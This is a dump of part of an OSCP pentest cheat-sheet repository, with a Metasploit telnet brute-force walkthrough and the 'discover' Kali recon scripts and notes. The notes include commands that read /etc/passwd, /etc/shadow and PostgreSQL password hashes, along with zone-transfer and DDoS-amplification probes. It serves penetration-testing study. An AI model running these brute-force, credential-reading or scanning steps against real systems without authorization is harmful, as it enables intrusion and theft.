 2 | nmap -p 23 --script telnet-brute --script-args userdb=/usr/share/metasploit-framework/data/wordlists/unix_users,passdb=/usr/share/wordlists/rockyou.txt,telnet-brute.timeout=20s 10.11.1.22
 3 | 
 4 |   == metasploit ==
 5 | 1.  telnet bruteforce
 6 | 
 7 | use auxiliary/scanner/telnet/telnet_login
 8 | msf auxiliary(telnet_login) > set BLANK_PASSWORDS false
 9 | BLANK_PASSWORDS => false
10 | msf auxiliary(telnet_login) > set PASS_FILE passwords.txt
11 | PASS_FILE => passwords.txt
12 | msf auxiliary(telnet_login) > set RHOSTS 192.168.1.0/24
13 | RHOSTS => 192.168.1.0/24
14 | msf auxiliary(telnet_login) > set THREADS 254
15 | THREADS => 254
16 | msf auxiliary(telnet_login) > set USER_FILE users.txt
17 | USER_FILE => users.txt
18 | msf auxiliary(telnet_login) > set VERBOSE false
19 | VERBOSE => false
20 | msf auxiliary(telnet_login) > run
21 | 
22 | msf auxiliary(telnet_login) > sessions -l  // to see the sessions that succeded
23 | 
24 | 
25 | 
26 | 2. telnet version
27 | use auxiliary/scanner/telnet/telnet_version
28 | msf auxiliary(telnet_version) > set RHOSTS 192.168.1.0/24
29 | RHOSTS => 192.168.1.0/24
30 | msf auxiliary(telnet_version) > set THREADS 254
31 | THREADS => 254
32 | msf auxiliary(telnet_version) > run
33 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/.gitignore:
--------------------------------------------------------------------------------
1 | *.gnamp
2 | *.nmap
3 | *.xml
4 | .idea
5 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/LICENCE:
--------------------------------------------------------------------------------
 1 | Copyright (c) 2015, Lee Baird
 2 | All rights reserved.
 3 | 
 4 | Redistribution and use in source and binary forms, with or without
 5 | modification, are permitted provided that the following conditions are met:
 6 | 
 7 | * Redistributions of source code must retain the above copyright notice, this
 8 |   list of conditions and the following disclaimer.
 9 | 
10 | * Redistributions in binary form must reproduce the above copyright notice,
11 |   this list of conditions and the following disclaimer in the documentation
12 |   and/or other materials provided with the distribution.
13 | 
14 | * Neither the name of [project] nor the names of its
15 |   contributors may be used to endorse or promote products derived from
16 |   this software without specific prior written permission.
17 | 
18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
19 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
20 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
22 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
23 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
24 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
25 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
26 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
27 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
28 | 
29 | 
30 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/README.md:
--------------------------------------------------------------------------------
  1 | For use with Kali Linux. Custom bash scripts used to automate various pentesting tasks.
  2 | 
  3 | # Licence
  4 | 
  5 | This project is licensed under the ```BSD 3-clause “New” or “Revised” License```. For more information please see the licence file
  6 | 
  7 | ### Download, setup & usage
  8 | * git clone git://github.com/leebaird/discover.git /opt/discover/
  9 | * All scripts must be ran from this location.
 10 | * cd /opt/discover/
 11 | * ./setup.sh
 12 | * ./discover.sh
 13 | 
 14 | ```
 15 | RECON
 16 | 1.  Domain
 17 | 2.  Person
 18 | 3.  Parse salesforce
 19 | 
 20 | SCANNING
 21 | 4.  Generate target list
 22 | 5.  CIDR
 23 | 6.  List
 24 | 7.  IP or domain
 25 | 
 26 | WEB
 27 | 8.  Open multiple tabs in Iceweasel
 28 | 9.  Nikto
 29 | 10. SSL
 30 | 
 31 | MISC
 32 | 11. Crack WiFi
 33 | 12. Parse XML
 34 | 13. Start a Metasploit listener
 35 | 14. Update
 36 | 15. Exit
 37 | ```
 38 | ## RECON
 39 | ### Domain
 40 | ```
 41 | RECON
 42 | 
 43 | 1.  Passive
 44 | 2.  Active
 45 | 3.  Previous menu
 46 | ```
 47 | 
 48 | * Passive combines goofile, goog-mail, goohost, theHarvester, Metasploit, dnsrecon, URLCrazy, Whois and multiple webistes.
 49 | * Active combines Nmap, dnsrecon, Fierce, lbd, WAF00W, traceroute and Whatweb.
 50 | 
 51 | ### Person
 52 | ```
 53 | RECON
 54 | 
 55 | First name:
 56 | Last name:
 57 | ```
 58 | 
 59 | * Combines info from multiple websites.
 60 | 
 61 | ### Parse salesforce
 62 | ```
 63 | Create a free account at salesforce (https://connect.data.com/login).
 64 | Perform a search on your target company > select the company name > see all.
 65 | Copy the results into a new file.
 66 | 
 67 | Enter the location of your list:
 68 | ```
 69 | 
 70 | * Gather names and positions into a clean list.
 71 | 
 72 | ## SCANNING
 73 | ### Generate target list
 74 | ```
 75 | SCANNING
 76 | 
 77 | 1.  Local area network
 78 | 2.  NetBIOS
 79 | 3.  netdiscover
 80 | 4.  Ping sweep
 81 | 5.  Previous menu
 82 | ```
 83 | 
 84 | * Use different tools to create a target list including Angry IP Scanner, arp-scan, netdiscover and nmap pingsweep.
 85 | 
 86 | ### CIDR, List, IP or domain
 87 | ```
 88 | Type of scan:
 89 | 
 90 | 1.  External
 91 | 2.  Internal
 92 | 3.  Previous menu
 93 | ```
 94 | 
 95 | * External scan will set the nmap source port to 53 and the max-rrt-timeout to 1500ms.
 96 | * Internal scan will set the nmap source port to 88 and the max-rrt-timeout to 500ms.
 97 | * Nmap is used to perform host discovery, port scanning, service enumeration and OS identification.
 98 | * Matching nmap scripts are used for additional enumeration.
 99 | * Matching Metasploit auxiliary modules are also leveraged.
100 | 
101 | ## WEB
102 | ### Open multiple tabs in Iceweasel
103 | ```
104 | Open multiple tabs in Iceweasel with:
105 | 
106 | 1.  List
107 | 2.  Directories from a domain's robot.txt.
108 | 3.  Previous menu
109 | ```
110 | 
111 | * Use a list containing IPs and/or URLs.
112 | * Use wget to pull a domain's robot.txt file, then open all of the directories.
113 | 
114 | ### Nikto
115 | ```
116 | Run multiple instances of Nikto in parallel.
117 | 
118 | 1.  List of IPs.
119 | 2.  List of IP:port.
120 | 3.  Previous menu
121 | ```
122 | ### SSL
123 | ```
124 | Check for SSL certificate issues.
125 | 
126 | Enter the location of your list:
127 | ```
128 | 
129 | * Use sslscan and sslyze to check for SSL/TLS certificate issues.
130 | 
131 | 
132 | ## MISC
133 | ### Crack WiFi
134 | 
135 | * Crack wireless networks.
136 | 
137 | ### Parse XML
138 | ```
139 | Parse XML to CSV.
140 | 
141 | 1.  Burp (Base64)
142 | 2.  Nessus
143 | 3.  Nexpose
144 | 4.  Nmap
145 | 5.  Qualys
146 | 6.  Previous menu
147 | ```
148 | 
149 | ### Start a Metasploit listener
150 | 
151 | * Setup a multi/handler with a windows/meterpreter/reverse_tcp payload on port 443.
152 | 
153 | 
154 | ### Update
155 | 
156 | * Use to update Kali Linux, Discover scripts, various tools and the locate database.
157 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/alias:
--------------------------------------------------------------------------------
 1 | # To enable these aliases or when you modify this file:
 2 | # cp /opt/discover/alias /root/.bash_aliases ; source /root/.bash_aliases
 3 | 
 4 | dns=$(grep 'nameserver' /etc/resolv.conf | awk '{print $2}')
 5 | interface=$(ifconfig | grep -B1 'inet addr' | egrep -v '(-|inet addr|Loopback)' | cut -d ' ' -f1)
 6 | ip=$(ifconfig | grep 'Bcast' | awk '{print$2}' | cut -d ':' -f2)
 7 | mac=$(ifconfig | grep -B1 'inet addr' | egrep -v '(-|inet addr|Loopback)' | awk '{print$5}')
 8 | 
 9 | alias c='clear'
10 | alias cl='clear ; ls -l'
11 | alias d='cd /root/Desktop/ ; clear'
12 | alias e='exit'
13 | alias i='echo ; echo ; echo "DNS      " $dns ; echo ; ifconfig ; ping google.com -c3 ; echo ; echo'
14 | alias l='ls -l'
15 | alias n='echo ; netstat -antup | egrep -v "Active" ; echo ;
16 | echo -n "Interface:    "$interface ; echo ;
17 | echo -n "MAC address:  "$mac ; echo ;
18 | echo -n "Internal IP:  "$ip ; echo ;
19 | echo -n "External IP:  " ; curl ifconfig.me ; echo'
20 | alias r='cd /root/ ; clear'
21 | alias s='cd /opt/discover/ ; clear'
22 | 
23 | alias nexpose='service postgresql stop ; cd /opt/rapid7/nexpose/nsc ; ./nsc.sh'
24 | 
25 | alias sip='sort -V'
26 | 
27 | alias update='/opt/discover/update.sh'
28 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/misc/compare-sites.sh:
--------------------------------------------------------------------------------
  1 | #!/bin/bash
  2 | 
  3 | clear
  4 | 
  5 | break="=================================================="
  6 | DIR=/root/Desktop/compare-sites
  7 | DIFFONLY=false
  8 | 
  9 | usage(){
 10 | echo
 11 | echo
 12 | echo "Compare changes to home pages."
 13 | echo
 14 | echo
 15 | echo "Where file contains a list of URLs to be compared."
 16 | echo "Usage: $0 [options] file"
 17 | echo
 18 | echo "Options:"
 19 | echo " -c Compare versions."
 20 | echo " -o Output directory. Default: /root/Desktop/compare-sites"
 21 | echo
 22 | echo
 23 | }
 24 | 
 25 | ts2date(){
 26 | date -d "1970-01-01 $1 sec"
 27 | }
 28 | 
 29 | while getopts "o:c" OPTION; do
 30 |      case $OPTION in
 31 |           o) DIR="$OPTARG";;
 32 |           c) DIFFONLY=true;;
 33 |           *) echo && echo && exit;;
 34 |      esac
 35 | done
 36 | 
 37 | shift $(($OPTIND - 1))
 38 | FILE=$*
 39 | 
 40 | if [ -z $FILE ]; then
 41 |      usage
 42 |      exit
 43 | fi
 44 | 
 45 | if [ ! -f $FILE ]; then
 46 |      echo
 47 |      echo
 48 |      echo "File does not exist."
 49 |      echo
 50 |      echo
 51 |      exit
 52 | fi
 53 | 
 54 | if [ ! -d $DIR ]; then
 55 |      mkdir $DIR
 56 | fi
 57 | 
 58 | FILEHASH=${FILEHASH%%$FILE} # remove input file name from hash string (sha256sum)
 59 | HDIR="$DIR/$FILEHASH"
 60 | VERSION=1
 61 | 
 62 | while [ -f $HDIR/$VERSION ]; do
 63 |      VERSION=$(($VERSION + 1))
 64 | done
 65 | 
 66 | if ! $DIFFONLY; then
 67 |      date +%s > $HDIR/$VERSION
 68 |      echo
 69 |      echo
 70 |      echo "Downloading:"
 71 | 
 72 |      for URL in $(cat $FILE); do
 73 |           HASH=$(sha256sum <<<$URL | tr -d " -")
 74 |           echo "[*] $URL"
 75 |           wget -q $URL -O $HDIR/$URL-$HASH-$VERSION
 76 |      done
 77 | 
 78 |      echo
 79 |      echo $break
 80 | else
 81 |      VERSION=$(($VERSION - 1))
 82 | fi
 83 | 
 84 | if [ $VERSION -gt 1 ]; then
 85 |      echo
 86 |      echo "Versions:"
 87 | 
 88 |      for ((i=1; i<=${VERSION}; i++)); do
 89 |           echo $i - $(ts2date $(cat $HDIR/$i))
 90 |      done
 91 | 
 92 |      echo
 93 |      echo -n "Base version: "
 94 |      read A
 95 |      echo -n "Compare with: "
 96 |      read B
 97 | 
 98 |      [ -z $A ] && A="1";
 99 |      [ -z $B ] && B=$VERSION
100 | 
101 |      for URL in $(cat $FILE); do
102 |           echo
103 |           echo $break
104 |           echo
105 |           echo -e "\e[1;34m$URL\e[0m"
106 |           HASH=$(sha256sum <<<$URL | tr -d " -")
107 |           diff $HDIR/$URL-$HASH-$A $HDIR/$URL-$HASH-$B | grep '<iframe src='
108 |           # frames, window.location, window.href
109 |      done
110 | fi
111 | 
112 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/misc/crawl.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | clear
 4 | echo
 5 | echo "Crawl"
 6 | echo
 7 | echo
 8 | echo "By Lee Baird"
 9 | echo
10 | echo "Returns a list of IP external web servers that are linked from home page."
11 | echo
12 | echo "Usage: target.com"
13 | echo
14 | 
15 | read -p "Domain: " domain
16 | 
17 | if [ -z $domain ]; then
18 |      echo
19 |      echo "#########################"
20 |      echo
21 |      echo "Invalid choice."
22 |      echo
23 |      exit
24 | fi
25 | 
26 | echo
27 | echo "#########################"
28 | echo
29 | 
30 | wget -q www.$domain
31 | 
32 | grep 'href=' index.html | cut -d '/' -f3 | grep $domain | cut -d '"' -f1 | sort -u > tmp
33 | 
34 | for x in $(cat tmp); do
35 |      host $x | grep 'has address' | cut -d ' ' -f1,4 >> tmp2
36 | done
37 | 
38 | column -t tmp2 | sort -u
39 | 
40 | rm index.html tmp*
41 | 
42 | echo
43 | echo
44 | 
45 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/misc/dns-forward.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | clear
 4 | echo
 5 | echo "DNS Forward"
 6 | echo
 7 | echo
 8 | echo "By Lee Baird"
 9 | echo
10 | echo "Show IP addresses of subdomains."
11 | echo
12 | echo "Usage: target.com"
13 | echo
14 | 
15 | read -p "Domain: " domain
16 | 
17 | if [ -z $domain ]; then
18 |      echo
19 |      echo "#########################"
20 |      echo
21 |      echo "Invalid choice."
22 |      echo
23 |      exit
24 | fi
25 | 
26 | echo
27 | echo "#########################"
28 | echo
29 | 
30 | for x in $(cat /usr/share/dnsenum/dns.txt); do
31 |      host $x.$domain | grep 'has address' | cut -d ' ' -f1,4 >> tmp
32 | done
33 | 
34 | column -t tmp | sort -u
35 | 
36 | rm tmp
37 | 
38 | echo
39 | echo
40 | 
41 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/misc/dns-reverse.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | clear
 4 | echo
 5 | echo "DNS Reverse"
 6 | echo
 7 | echo
 8 | echo "By Lee Baird"
 9 | echo
10 | echo "Perform a PTR DNS query on a Class C range and return FQDNs."
11 | echo
12 | echo "Usage: 192.168.1"
13 | echo
14 | 
15 | read -p "Class: " class
16 | 
17 | if [ -z $class ]; then
18 |      echo
19 |      echo "#########################"
20 |      echo
21 |      echo "Invalid choice."
22 |      echo
23 |      exit
24 | fi
25 | 
26 | echo
27 | echo "#########################"
28 | echo
29 | 
30 | for x in `seq 1 254`; do
31 |      host $class.$x | grep 'name pointer' | cut -d ' ' -f1,5
32 | done
33 | 
34 | echo
35 | echo
36 | 
37 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/misc/dns-transfer.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | clear
 4 | echo
 5 | echo "DNS Transfer"
 6 | echo
 7 | echo
 8 | echo "By Lee Baird"
 9 | echo
10 | echo "Check for DNS zone transfer."
11 | echo
12 | echo "Usage: target.com"
13 | echo
14 | 
15 | read -p "Domain: " domain
16 | 
17 | if [ -z $domain ]; then
18 |      echo
19 |      echo "#########################"
20 |      echo
21 |      echo "Invalid choice."
22 |      echo
23 |      exit
24 | fi
25 | 
26 | echo
27 | echo "#########################"
28 | echo
29 | 
30 | for x in $(host -t ns $domain | cut -d ' ' -f4); do
31 |      host -l $domain $x
32 | done
33 | 
34 | echo
35 | echo
36 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/misc/enum-solaris.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | uname -a
 4 | ifconfig -a
 5 | route
 6 | mount
 7 | cat /etc/passwd
 8 | cat /etc/shadow
 9 | /usr/bin/pkginfo -l
10 | /usr/bin/svcs -a
11 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/misc/netblocks.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | clear
 4 | echo
 5 | echo "Netblocks"
 6 | echo
 7 | echo
 8 | echo "By Lee Baird"
 9 | echo
10 | echo "This returns a list of Class A owners and takes about 100 sec."
11 | echo
12 | 
13 | for x in `seq 1 255`; do
14 |      whois $x.0.0.0 | egrep '(CIDR|OrgName)' >> tmp
15 |      echo >> tmp
16 | done
17 | 
18 | egrep -v '(%|No address)' tmp > tmp2
19 | cat -s tmp2 > netblocks.txt
20 | 
21 | rm tmp*
22 | 
23 | echo
24 | echo
25 | 
26 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/misc/ping-sweep.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | clear
 4 | echo
 5 | echo "PIng Sweep"
 6 | echo
 7 | echo
 8 | echo "By Lee Baird"
 9 | echo
10 | echo "Find live hosts in a Class C."
11 | echo
12 | echo "Usage: 192.168.1"
13 | echo
14 | 
15 | read -p "Class: " class
16 | 
17 | if [ -z $class ]; then
18 |      echo
19 |      echo "#########################"
20 |      echo
21 |      echo "Invalid choice."
22 |      echo
23 |      exit
24 | fi
25 | 
26 | echo
27 | echo "#########################"
28 | echo
29 | 
30 | for x in `seq 1 254`; do
31 |      ping -c 2 $class.$x | grep 'bytes from' | cut -d ' ' -f4 | cut -d ':' -f1 &
32 | done
33 | 
34 | echo
35 | echo
36 | 
37 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/misc/python/ex1.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | import os
 4 | import sys
 5 | 
 6 | os.system('clear')
 7 | port = raw_input('\nEnter a valid port: ')
 8 | 
 9 | if port == '':
10 |      print '\nYou did not enter anything.\n\n'
11 |      sys.exit(1)
12 | 
13 | try:
14 |      val = int(port)
15 | except ValueError:
16 |      print('\nThat is not an number.\n\n')
17 |      sys.exit(1)
18 | 
19 | if int(port) not in range(1,65535):
20 |      print '\nThat is an invalid port.\n\n'
21 | else:
22 |      print '\nThat is a valid port.\n\n'
23 | 
24 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/misc/python/ex2.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | import os
 4 | from xml.dom.minidom import parse
 5 | import xml.dom.minidom
 6 | 
 7 | os.system('clear')
 8 | 
 9 | # Open XML document using minidom parser
10 | DOMTree = xml.dom.minidom.parse('movies.xml')
11 | collection = DOMTree.documentElement
12 | if collection.hasAttribute('shelf'):
13 |      print '\n\nRoot element: %s\n' % collection.getAttribute('shelf')
14 | 
15 | # Get all the movies in the collection
16 | movies = collection.getElementsByTagName('movie')
17 | 
18 | # Print details of each movie.
19 | for movie in movies:
20 |      print '***** Movie *****'
21 |      if movie.hasAttribute('title'):
22 |           print 'Title: %s' % movie.getAttribute('title')
23 | 
24 |      type = movie.getElementsByTagName('type')[0]
25 |      print 'Type: %s' % type.childNodes[0].data
26 |      format = movie.getElementsByTagName('format')[0]
27 |      print 'Format: %s' % format.childNodes[0].data
28 |      rating = movie.getElementsByTagName('rating')[0]
29 |      print 'Rating: %s' % rating.childNodes[0].data
30 |      description = movie.getElementsByTagName('description')[0]
31 |      print 'Description: %s' % description.childNodes[0].data
32 | 
33 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/misc/python/multitabs.py:
--------------------------------------------------------------------------------
 1 | # multitabs.py
 2 | #
 3 | # By Lee Baird
 4 | # Feel free to contact me via chat or email with any feedback or suggestions that you may have:
 5 | # leebaird@gmail.com
 6 | #
 7 | ##############################################################################################################
 8 | 
 9 | os.system('clear')
10 | banner()
11 | 
12 | runlocally()
13 | 
14 | print colorblue.format('Open multiple tabs in Firefox with:')
15 | print
16 | print "1. List containing IPs and/or URLs."
17 | print "2. Directories from a domain\'s robot.txt."
18 | print "3. Previous menu"
19 | print
20 | choice = raw_input('Choice: ')
21 | 
22 | if choice == "1":
23 |      print
24 |      location = raw_input('Enter the location of your list: ')
25 | 
26 |      if os.path.isfile(location):
27 |           f = open(location,'r') # Setup a read connection directory
28 |           filedata = f.read() # Read the file
29 |           f.close() # Close the connection
30 |           filedata = filedata.split('\n') # Turn into a list
31 |           filedata = [x for x in filedata if not x == ""] # Ignore blank lines
32 | 
33 |           port = raw_input('Port: ')
34 | 
35 |           if port.isdigit():
36 |                if int(port) in range(1,65535):
37 |                     if port == "21":
38 |                          for i in filedata:
39 |                               webbrowser.open('ftp://'+i)
40 |                               time.sleep(1)
41 |                     elif port == "80":
42 |                          for i in filedata:
43 |                               webbrowser.open('http://'+i)
44 |                               time.sleep(1)
45 |                     elif port == "443":
46 |                          for i in filedata:
47 |                               webbrowser.open('https://'+i)
48 |                               time.sleep(1)
49 |                     else:
50 |                          for i in filedata:
51 |                               webbrowser.open('http://'+i+':'+port)
52 |                               time.sleep(1)
53 |                else:
54 |                     error()
55 |           else:
56 |                error()
57 |      else:
58 |           error()
59 | 
60 | if choice == "2":
61 |      print
62 |      print line
63 |      print
64 |      print 'Usage: target.com or target-IP'
65 |      print
66 |      domain = raw_input('Domain: ')
67 | 
68 |      # Check for no answer
69 |      if domain == "":
70 |           error()
71 | 
72 |      response = urllib2.urlopen('http://'+domain+'/robots.txt')
73 |      robots = response.read()
74 |      robots = robots.split('\n')
75 |      
76 |      for i in robots:
77 |           if 'Disallow' in i:
78 |                j = i.split(' ')
79 |                f = open(os.path.expanduser('~')+'/'+domain+'-robots.txt','a')
80 |                f.write(j[1]+'\n')
81 |                f.close()
82 |                webbrowser.open('http://'+domain+j[1])
83 |                time.sleep(1)
84 | 
85 |      print
86 |      print line
87 |      print
88 |      print '***Scan complete.***'
89 |      print
90 |      print 'The new report is located at /'+user+'/'+domain+'-robots.txt'
91 |      print
92 |      print
93 |      sys.exit(0)
94 | 
95 | if choice == "3":
96 |      main()
97 | else:
98 |      error()
99 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/misc/python/test.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | f = open('tmp','r')                                # Setup a read connection to file
 4 | filedata = f.read()                                # Read the file
 5 | f.close()                                          # Close the connection
 6 | filedata = filedata.split('\n')                    # Turn into a list
 7 | 
 8 | ##############################
 9 | 
10 | out = []                                           # Create an empty array
11 | 
12 | for i in filedata:
13 |      if '@' in i:                                  # grep '@'
14 |           if not 'apples' in i:                    # grep -v 'apples'
15 |                out.append(i.lower())               # Append to array and change to lower case
16 | 
17 | out = list(set(out))                               # Make list unique
18 | out.sort()                                         # Sort
19 | 
20 | for j in out:
21 |      print j
22 | 
23 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/mods/goog-mail.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | import sys
 4 | import re
 5 | import string
 6 | import httplib
 7 | import urllib2
 8 | 
 9 | def StripTags(text):
10 |     finished = 0
11 |     while not finished:
12 |         finished = 1
13 |         start = text.find("<")
14 |         if start >= 0:
15 |             stop = text[start:].find(">")
16 |             if stop >= 0:
17 |                 text = text[:start] + text[start+stop+1:]
18 |                 finished = 0
19 |     return text
20 | if len(sys.argv) != 2:
21 |         print "\nExtracts emails from Google results.\n"
22 |         print "\nUsage: ./goog-mail.py <domain>\n"
23 |         sys.exit(1)
24 | 
25 | domain_name=sys.argv[1]
26 | d={}
27 | page_counter = 0
28 | try:
29 |     while page_counter < 50 :
30 |         results = 'http://groups.google.com/groups?q='+str(domain_name)+'&hl=en&lr=&ie=UTF-8&start=' + repr(page_counter) + '&sa=N'
31 |         request = urllib2.Request(results)
32 |         request.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)')
33 |         opener = urllib2.build_opener()                           
34 |         text = opener.open(request).read()
35 |         emails = (re.findall('([\w\.\-]+@'+domain_name+')',StripTags(text)))
36 |         for email in emails:
37 |             d[email]=1
38 |             uniq_emails=d.keys()
39 |         page_counter = page_counter +10
40 | except IOError:
41 |     print "Cannot connect to Google Groups."+""
42 |     
43 | page_counter_web=0
44 | try:
45 |     while page_counter_web < 50 :
46 |         results_web = 'http://www.google.com/search?q=%40'+str(domain_name)+'&hl=en&lr=&ie=UTF-8&start=' + repr(page_counter_web) + '&sa=N'
47 |         request_web = urllib2.Request(results_web)
48 |         request_web.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)')
49 |         opener_web = urllib2.build_opener()                           
50 |         text = opener_web.open(request_web).read()
51 |         emails_web = (re.findall('([\w\.\-]+@'+domain_name+')',StripTags(text)))
52 |         for email_web in emails_web:
53 |             d[email_web]=1
54 |             uniq_emails_web=d.keys()
55 |         page_counter_web = page_counter_web +10
56 |         
57 | except IOError:
58 |     print "Cannot connect to Google Web."+""
59 | for uniq_emails_web in d.keys():
60 |     print uniq_emails_web+""
61 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/notes/MSSQL Injection Cheat Sheet.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/ENUMERATION/discover-master/notes/MSSQL Injection Cheat Sheet.pdf


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/notes/databases.txt:
--------------------------------------------------------------------------------
 1 | Databases
 2 | 
 3 |  
 4 | # MySQL
 5 | 
 6 | mysql -h <IP> -u <username> -p
 7 | 
 8 | SET PASSWORD FOR root@localhost = PASSWORD('newpassword');
 9 | 
10 | SHOW DATABASES;
11 | USE <db name>;
12 | SHOW TABLES;
13 | SHOW FIELDS FROM <table>;
14 | 
15 | DROP DATABASE <db name>;
16 | 
17 | CREATE DATABASE <db name>;
18 | GRANT ALL PRIVILEGES ON <db name>.* TO 'username' @ 'localhost' IDENTIFIED BY 'password';
19 | SHOW GRANTS FOR 'username'@'localhost';
20 | 
21 | SELECT * FROM <table>;
22 | SELECT * FROM <table> WHERE <field> = “value”;
23 | 
24 | SELECT LOAD_FILE('/etc/passwd')\g;
25 | 
26 | DROP TABLE 'table1', 'table2', 'table3';
27 | 
28 | ORDER BY <field> <ASC, DESC> 
29 | GROUP BY <field>
30 | LIMIT <number>
31 | OFFSET <number>
32 | ------------------------------------------------------------------------------------------------------
33 | 
34 | # Postgresql
35 | 
36 | psql -h <IP> -U <username> -d <database> 
37 | -W <password>
38 | select username, passwd from pg_shadow;
39 | select current_database();
40 | create table test (input TEXT); copy test from '/etc/passwd'; select input from test;
41 | 
42 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/notes/dns.txt:
--------------------------------------------------------------------------------
 1 | DNS
 2 | 
 3 | 
 4 | # General
 5 | 
 6 | dig target.com <type>                    # a, mx, ns, soa, srv, txt, any
 7 | dig -x <target IP>                       # Pointer records
 8 | dig @nameserverIP target.com axfr        # Zone transfer
 9 | dig @nameserverIP target.com afro        # Forward zone transfer
10 | 
11 | host -t ns target.com                    # Show name servers 
12 | host -t mx target.com                    # Show mail servers
13 | host www.target.com
14 | host -l target.com <nameserver>          # Zone transfer
15 | ------------------------------------------------------------------------------------------------------
16 |  
17 | # Cache snooping
18 | 
19 | host -r www.google.com <nameserver IP>
20 | ------------------------------------------------------------------------------------------------------
21 | 
22 | # DNS cache poisioning
23 | 
24 | for i in `53.txt`; do dig @"$i" +short porttest.dns-oarc.net TXT; done; > CachePoison.txt
25 | ------------------------------------------------------------------------------------------------------
26 | 
27 | # Non-recursive DNS queries
28 | 
29 | for i in `cat 53.txt`; do dig @"$i" www.google.com A +norecurse; done > NonRecurive.txt
30 | ------------------------------------------------------------------------------------------------------
31 | 
32 | # Open DNS resolution against a DNS server.
33 | 
34 | Supply a hostname not cached or inside a company owned domain.
35 | nslookup www.nsa.gov <nameserver IP>
36 | ------------------------------------------------------------------------------------------------------
37 | 
38 | # Spoofed request amplification DDoS
39 | 
40 | for i in `cat 53.txt`; do dig @"$i" . NS; done > AmpDDoS.txt
41 | 
42 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/notes/exploits.txt:
--------------------------------------------------------------------------------
 1 | Exploits
 2 | 
 3 | 
 4 | cd /usr/share/exploitdb/
 5 | searchsploit <term1> <term2> <term3>
 6 | searchsploit sshd remote 1.2
 7 | 
 8 | Choose your exploit and copy it to a working location.
 9 | cp platforms/windows/remote/5751.pl /root/exploit.pl
10 | ------------------------------------------------------------------------------------------------------
11 | 
12 | # Headers
13 | 
14 | Some exploits may be written for compilation under Windows, while others for Linux.
15 | You can identify the environment by inspecting the headers.
16 | 
17 | Linux - arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h
18 | 
19 | Windows - process.h, string.h, winbase.h, windows.h, winsock2.h
20 | ------------------------------------------------------------------------------------------------------
21 | 
22 | # Grep out Windows headers, to leave only Linux based exploits.
23 | 
24 | cat sploitlist.txt | grep -i 'exploit' | cut -d ' ' -f1 | xargs grep 'sys' | cut -d ':' -f1 | sort -u
25 | 
26 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/notes/git.txt:
--------------------------------------------------------------------------------
  1 | Cloning your fork
  2 | Clone the repository from your fork
  3 | 
  4 |    git clone git@github.com:<username>/<repo-name>.git
  5 |    git clone git@github.com:kraman/crankcase.git
  6 | 
  7 | Add the upstream repo so that you can pull changes
  8 | 
  9 |    git remote add upstream <original repo git url>
 10 |    git remote add upstream git@github.com:openshift/crankcase.git
 11 | 
 12 | 
 13 | Stop Errors pushing changes
 14 | 
 15 |     # Point this command to your fork of the repository
 16 |     git remote set-url origin git@github.com:<username>/<repo-name>.git
 17 | 
 18 | Working on a topic branch
 19 | 
